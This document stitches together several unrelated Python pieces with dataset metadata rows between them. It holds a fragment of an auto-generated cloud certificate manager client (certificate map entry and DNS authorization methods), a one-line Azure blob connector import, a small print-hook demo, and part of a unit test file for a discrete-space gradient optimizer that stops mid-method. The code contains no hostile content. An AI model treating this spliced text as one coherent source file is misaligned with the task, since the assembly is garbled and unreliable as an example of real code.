self._transport.operations_client,
certificate_manager.CertificateMapEntry,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate_map_entry(
self,
request: Union[
certificate_manager.UpdateCertificateMapEntryRequest, dict
] = None,
*,
certificate_map_entry: certificate_manager.CertificateMapEntry = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
certificate_map_entry = certificate_manager_v1.CertificateMapEntry()
certificate_map_entry.hostname = "hostname_value"
request = certificate_manager_v1.UpdateCertificateMapEntryRequest(
certificate_map_entry=certificate_map_entry,
)
# Make the request
operation = client.update_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateMapEntryRequest, dict]):
The request object. Request for the
`UpdateCertificateMapEntry` method.
certificate_map_entry (google.cloud.certificate_manager_v1.types.CertificateMapEntry):
Required. A definition of the
certificate map entry to create map
entry.
This corresponds to the ``certificate_map_entry`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMapEntry`
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate_map_entry, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.UpdateCertificateMapEntryRequest
):
request = certificate_manager.UpdateCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate_map_entry is not None:
request.certificate_map_entry = certificate_map_entry
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate_map_entry.name", request.certificate_map_entry.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMapEntry,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate_map_entry(
self,
request: Union[
certificate_manager.DeleteCertificateMapEntryRequest, dict
] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateMapEntryRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateMapEntryRequest, dict]):
The request object. Request for the
`DeleteCertificateMapEntry` method.
name (str):
Required. A name of the certificate map entry to delete.
Must be in the format
``projects/*/locations/*/certificateMaps/*/certificateMapEntries/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.DeleteCertificateMapEntryRequest
):
request = certificate_manager.DeleteCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_dns_authorizations(
self,
request: Union[certificate_manager.ListDnsAuthorizationsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListDnsAuthorizationsPager:
r"""Lists DnsAuthorizations in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_dns_authorizations():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListDnsAuthorizationsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_dns_authorizations(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListDnsAuthorizationsRequest, dict]):
The request object. Request for the
`ListDnsAuthorizations` method.
parent (str):
Required. The project and location from which the dns
authorizations should be listed, specified in the format
``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListDnsAuthorizationsPager:
Response for the ListDnsAuthorizations method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListDnsAuthorizationsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListDnsAuthorizationsRequest):
request = certificate_manager.ListDnsAuthorizationsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_dns_authorizations]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListDnsAuthorizationsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_dns_authorization(
self,
request: Union[certificate_manager.GetDnsAuthorizationRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.DnsAuthorization:
r"""Gets details of a single DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetDnsAuthorizationRequest(
name="name_value",
)
# Make the request
response = client.get_dns_authorization(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetDnsAuthorizationRequest, dict]):
The request object. Request for the
`GetDnsAuthorization` method.
name (str):
Required. A name of the dns authorization to describe.
Must be in the format
``projects/*/locations/*/dnsAuthorizations/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.DnsAuthorization:
A DnsAuthorization resource describes
a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetDnsAuthorizationRequest):
request = certificate_manager.GetDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_dns_authorization]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_dns_authorization(
self,
request: Union[certificate_manager.CreateDnsAuthorizationRequest, dict] = None,
*,
parent: str = None,
dns_authorization: certificate_manager.DnsAuthorization = None,
dns_authorization_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new DnsAuthorization in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
dns_authorization = certificate_manager_v1.DnsAuthorization()
dns_authorization.domain = "domain_value"
request = certificate_manager_v1.CreateDnsAuthorizationRequest(
parent="parent_value",
dns_authorization_id="dns_authorization_id_value",
dns_authorization=dns_authorization,
)
# Make the request
operation = client.create_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateDnsAuthorizationRequest, dict]):
The request object. Request for the
`CreateDnsAuthorization` method.
parent (str):
Required. The parent resource of the dns authorization.
Must be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
dns_authorization (google.cloud.certificate_manager_v1.types.DnsAuthorization):
Required. A definition of the dns
authorization to create.
This corresponds to the ``dns_authorization`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
dns_authorization_id (str):
Required. A user-provided name of the
dns authorization.
This corresponds to the ``dns_authorization_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.certificate_manager_v1.types.DnsAuthorization` A DnsAuthorization resource describes a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, dns_authorization, dns_authorization_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateDnsAuthorizationRequest):
request = certificate_manager.CreateDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if dns_authorization is not None:
request.dns_authorization = dns_authorization
if dns_authorization_id is not None:
request.dns_authorization_id = dns_authorization_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_dns_authorization]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.DnsAuthorization,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_dns_authorization(
self,
request: Union[certificate_manager.UpdateDnsAuthorizationRequest, dict] = None,
*,
dns_authorization: certificate_manager.DnsAuthorization = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
dns_authorization = certificate_manager_v1.DnsAuthorization()
dns_authorization.domain = "domain_value"
request = certificate_manager_v1.UpdateDnsAuthorizationRequest(
dns_authorization=dns_authorization,
)
# Make the request
operation = client.update_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateDnsAuthorizationRequest, dict]):
The request object. Request for the
`UpdateDnsAuthorization` method.
dns_authorization (google.cloud.certificate_manager_v1.types.DnsAuthorization):
Required. A definition of the dns
authorization to update.
This corresponds to the ``dns_authorization`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.certificate_manager_v1.types.DnsAuthorization` A DnsAuthorization resource describes a way to perform domain authorization
for certificate issuance.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([dns_authorization, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateDnsAuthorizationRequest):
request = certificate_manager.UpdateDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if dns_authorization is not None:
request.dns_authorization = dns_authorization
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_dns_authorization]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("dns_authorization.name", request.dns_authorization.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.DnsAuthorization,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_dns_authorization(
self,
request: Union[certificate_manager.DeleteDnsAuthorizationRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single DnsAuthorization.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_dns_authorization():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteDnsAuthorizationRequest(
name="name_value",
)
# Make the request
operation = client.delete_dns_authorization(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteDnsAuthorizationRequest, dict]):
The request object. Request for the
`DeleteDnsAuthorization` method.
name (str):
Required. A name of the dns authorization to delete.
Must be in the format
``projects/*/locations/*/dnsAuthorizations/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteDnsAuthorizationRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteDnsAuthorizationRequest):
request = certificate_manager.DeleteDnsAuthorizationRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_dns_authorization]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-certificate-manager",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("CertificateManagerClient",)
| 40.318381
| 201
| 0.612076
| 12,444
| 119,544
| 5.754581
| 0.047252
| 0.058065
| 0.030722
| 0.019034
| 0.825485
| 0.783131
| 0.760229
| 0.729898
| 0.712805
| 0.696202
| 0
| 0.002496
| 0.319615
| 119,544
| 2,964
| 202
| 40.331984
| 0.877926
| 0.5218
| 0
| 0.590426
| 0
| 0.001773
| 0.087241
| 0.038038
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045213
| false
| 0
| 0.022163
| 0.000887
| 0.119681
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c63f467ca82f24de98cbce5a2d075823494f5500
| 49
|
py
|
Python
|
azure_blob_utils/__init__.py
|
YuRiTan/azure-blob-utils
|
e20bbaee46e320948da3b8c0be4ed21a93182ca1
|
[
"MIT"
] | 1
|
2020-09-22T10:06:09.000Z
|
2020-09-22T10:06:09.000Z
|
azure_blob_utils/__init__.py
|
YuRiTan/azure-blob-utils
|
e20bbaee46e320948da3b8c0be4ed21a93182ca1
|
[
"MIT"
] | null | null | null |
azure_blob_utils/__init__.py
|
YuRiTan/azure-blob-utils
|
e20bbaee46e320948da3b8c0be4ed21a93182ca1
|
[
"MIT"
] | null | null | null |
from .connector import AzureBlobStorageConnector
| 24.5
| 48
| 0.897959
| 4
| 49
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d6cb183158737cb2ecd7e562b60c8a06cfcc77c0
| 126
|
py
|
Python
|
chapter-5/basic_hook/hook_it.py
|
Carl-Ty/Modular-Programming-with-Python
|
efe1c725602b2148fdeb530e89381895c3e7f696
|
[
"MIT"
] | null | null | null |
chapter-5/basic_hook/hook_it.py
|
Carl-Ty/Modular-Programming-with-Python
|
efe1c725602b2148fdeb530e89381895c3e7f696
|
[
"MIT"
] | null | null | null |
chapter-5/basic_hook/hook_it.py
|
Carl-Ty/Modular-Programming-with-Python
|
efe1c725602b2148fdeb530e89381895c3e7f696
|
[
"MIT"
] | null | null | null |
import get_hooked
def hooked_print():
print(f"{hooked_print.__name__} got hooked")
get_hooked.set_hook(hooked_print)
| 12.6
| 48
| 0.761905
| 19
| 126
| 4.526316
| 0.526316
| 0.383721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134921
| 126
| 9
| 49
| 14
| 0.788991
| 0
| 0
| 0
| 0
| 0
| 0.272
| 0.184
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0.75
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
d6df3638f9df97c6b106c9660ede84caefe12276
| 65
|
py
|
Python
|
yad2/__init__.py
|
odcinek/yad2
|
5ecf5073a7eb9651944837e33c083c4a1e7945bc
|
[
"MIT"
] | null | null | null |
yad2/__init__.py
|
odcinek/yad2
|
5ecf5073a7eb9651944837e33c083c4a1e7945bc
|
[
"MIT"
] | null | null | null |
yad2/__init__.py
|
odcinek/yad2
|
5ecf5073a7eb9651944837e33c083c4a1e7945bc
|
[
"MIT"
] | 1
|
2021-10-17T15:46:50.000Z
|
2021-10-17T15:46:50.000Z
|
from utils import *
from formats import *
from encoders import *
| 16.25
| 22
| 0.769231
| 9
| 65
| 5.555556
| 0.555556
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184615
| 65
| 3
| 23
| 21.666667
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ba4f9807b0a73bbadade768579cfd6dfb7f0806a
| 7,453
|
py
|
Python
|
src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py
|
zangobot/secml
|
95a293e1201c24256eb7fe2f1d2125cd5f318c8c
|
[
"Apache-2.0"
] | 63
|
2020-04-20T16:31:16.000Z
|
2022-03-29T01:05:35.000Z
|
src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py
|
zangobot/secml
|
95a293e1201c24256eb7fe2f1d2125cd5f318c8c
|
[
"Apache-2.0"
] | 5
|
2020-04-21T11:31:39.000Z
|
2022-03-24T13:42:56.000Z
|
src/secml/optim/optimizers/tests/test_c_optimizer_pgd_ls_discrete.py
|
zangobot/secml
|
95a293e1201c24256eb7fe2f1d2125cd5f318c8c
|
[
"Apache-2.0"
] | 8
|
2020-04-21T09:16:42.000Z
|
2022-02-23T16:28:43.000Z
|
from secml.optim.optimizers.tests import COptimizerTestCases
from secml.array import CArray
from secml.optim.optimizers import COptimizerPGDLS
from secml.optim.constraints import CConstraintBox, CConstraintL1
class TestCOptimizerPGDLSDiscrete(COptimizerTestCases):
"""Unittests for COptimizerPGDLS in discrete space."""
def test_minimize_3h_camel(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with an integer eta and an integer starting point.
The solution expected by this test is a integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(COptimizerPGDLS, '3h-camel',
opt_params=opt_params,
label='discrete',
out_int=True)
def test_minimize_3h_camel_l1(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with a floating eta (l1 constraint) and an integer starting point.
The solution expected by this test is a float vector.
"""
opt_params = {
'eta': 0.5, 'eta_min': 0.5, 'eps': 1e-12,
'constr': CConstraintL1(radius=2),
'bounds': CConstraintBox(lb=-1, ub=1)
}
self._test_minimize(COptimizerPGDLS, '3h-camel',
opt_params=opt_params,
label='discrete-l1')
def test_minimize_beale(self):
"""Test for COptimizer.minimize() method on 3h-camel fun.
This function tests the optimization in discrete space,
with a floating eta (l1 constraint) and an integer starting point.
The solution expected by this test is a float vector.
"""
opt_params = {
'eta': 1e-6, 'eta_min': 1e-4, 'eps': 1e-12,
'constr': CConstraintL1(center=CArray([2, 0]), radius=2),
'bounds': CConstraintBox(lb=0, ub=4)
}
self._test_minimize(COptimizerPGDLS, 'beale',
opt_params=opt_params,
label='discrete-l1')
def test_minimize_quad2d_no_bound(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 2-dimensional space.
This function tests the optimization in discrete space,
with an integer eta, an integer starting point and without any bound.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12
}
# both the starting point and eta are integer,
# therefore we expect an integer solution
self._test_minimize(COptimizerPGDLS, 'quad-2',
opt_params=opt_params,
label='quad-2-discrete',
out_int=True)
def test_minimize_quad2d_bound(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 2-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer starting point and with a box constraint.
The solution expected by this test is an integer vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-2',
opt_params=opt_params,
label='quad-2-discrete-bounded',
out_int=True)
def test_minimize_quad100d_sparse(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta, an integer and sparse starting point with box constraint.
The solution expected by this test is an integer sparse vector.
"""
opt_params = {
'eta': 1, 'eta_min': 1, 'eps': 1e-12,
'bounds': CConstraintBox(lb=-2, ub=3)
}
self._test_minimize(
COptimizerPGDLS, 'quad-100-sparse',
opt_params=opt_params,
label='quad-100-sparse-discrete-bounded',
out_int=True)
def test_minimize_quad100d_l1_sparse(self):
"""Test for COptimizer.minimize() method on a quadratic function in
a 100-dimensional space.
This function tests the optimization in discrete space, with an
integer eta (l1 constraint), an integer sparse starting point
with box constraint.
The solution expected by this test is an integer sparse vector.
"""
opt_params = {
